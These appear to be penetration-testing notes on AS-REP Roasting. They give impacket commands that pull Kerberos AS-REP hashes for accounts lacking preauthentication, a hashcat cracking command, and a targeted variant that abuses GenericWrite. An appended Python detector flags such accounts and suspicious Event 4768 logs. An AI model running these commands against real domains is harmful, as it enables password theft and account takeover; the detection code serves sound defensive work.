AS-REP Roasting
AS-REP Roasting is an attack against a misconfiguration in Kerberos where preauthentication is disabled for a user. Without preauthentication, an attacker can request an AS-REP (Authentication Service Response) from the domain controller for that user. The AS-REP contains data encrypted with the user's password hash, allowing the attacker to perform an offline brute-force attack to crack the hash and potentially obtain the user's password.
This can be done from Kali Linux as well as from Windows.
Initial Step: Identification
# Identify users with the "Do not require Kerberos preauthentication" option enabled, using impacket-GetNPUsers on Kali Linux:
impacket-GetNPUsers <domain>/'<username>':'<password>' -dc-ip <domain-controller-ip>
Type 1: Using Kali Linux:
# Fetch the hash and store it.
impacket-GetNPUsers -dc-ip $DC_IP -request -outputfile hashes.asreproast <domainName>/<Username>:<password>
# Crack the collected hashes with hashcat (mode 18200 = Kerberos 5 AS-REP, etype 23).
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Type 2: Using Windows:
Let's assume that we are conducting an assessment in which we cannot identify any AD users with the account option "Do not require Kerberos preauthentication" enabled. While enumerating, we notice that we have GenericWrite or GenericAll permissions on another AD user account. Using these permissions, we could reset that user's password, but this would lock the user out of the account. We could instead use these permissions to modify the User Account Control value of the user so that Kerberos preauthentication is no longer required, then request and crack the AS-REP as above. This attack is known as Targeted AS-REP Roasting. Notably, we should restore the user's original User Account Control value once we've obtained the hash.
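As an added defensive example (not part of the original notes), the following Python decodes the userAccountControl bit this attack depends on (DONT_REQ_PREAUTH, 0x400000) and scans Windows Security Event 4768 records for the pattern a roastable request leaves behind: Pre-Authentication Type 0 combined with RC4 ticket encryption (0x17). The account list, the 4768 field layout and all names and addresses are constructed sample data.

```python
"""Defensive checks for AS-REP roasting exposure (added example, not from the page)."""
import re

# userAccountControl bit for "Do not require Kerberos preauthentication"
DONT_REQ_PREAUTH = 0x400000


def accounts_without_preauth(accounts):
    """accounts: iterable of (sAMAccountName, userAccountControl as int).
    Returns the names whose DONT_REQ_PREAUTH bit is set, i.e. roastable accounts
    and also the accounts an attacker would flip for Targeted AS-REP Roasting."""
    return [name for name, uac in accounts if uac & DONT_REQ_PREAUTH]


# Constructed LDAP-style export: 512 = NORMAL_ACCOUNT, 66048 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
SAMPLE_ACCOUNTS = [
    ("alice", 512),
    ("svc_backup", 512 | DONT_REQ_PREAUTH),  # 4194816
    ("bob", 66048),
]

# Constructed Event 4768 (TGT requested) records, one per line, reduced to the relevant fields.
SAMPLE_4768 = """\
EventID=4768 Account Name=alice Client Address=10.0.0.5 Pre-Authentication Type=2 Ticket Encryption Type=0x12
EventID=4768 Account Name=svc_backup Client Address=10.0.0.77 Pre-Authentication Type=0 Ticket Encryption Type=0x17
EventID=4768 Account Name=bob Client Address=10.0.0.5 Pre-Authentication Type=2 Ticket Encryption Type=0x17
"""

EVENT_RE = re.compile(
    r"Account Name=(\S+).*?Client Address=(\S+).*?"
    r"Pre-Authentication Type=(\d+).*?Ticket Encryption Type=(0x[0-9a-fA-F]+)"
)


def suspicious_asrep_requests(log_text):
    """Return (account, client) pairs where a TGT was issued with no preauth (type 0)
    and RC4-HMAC encryption (0x17): the AS-REP that hashcat mode 18200 cracks."""
    hits = []
    for line in log_text.splitlines():
        m = EVENT_RE.search(line)
        if not m:
            continue
        account, client, preauth_type, etype = m.groups()
        if preauth_type == "0" and int(etype, 16) == 0x17:
            hits.append((account, client))
    return hits


if __name__ == "__main__":
    print("accounts without preauth:", accounts_without_preauth(SAMPLE_ACCOUNTS))
    print("suspicious 4768 events:", suspicious_asrep_requests(SAMPLE_4768))
```

A preauth type of 2 (PA-ENC-TIMESTAMP) is the normal case; an alert on type 0 plus 0x17 should also be paired with auditing changes to userAccountControl (Event 4738) to catch the targeted variant.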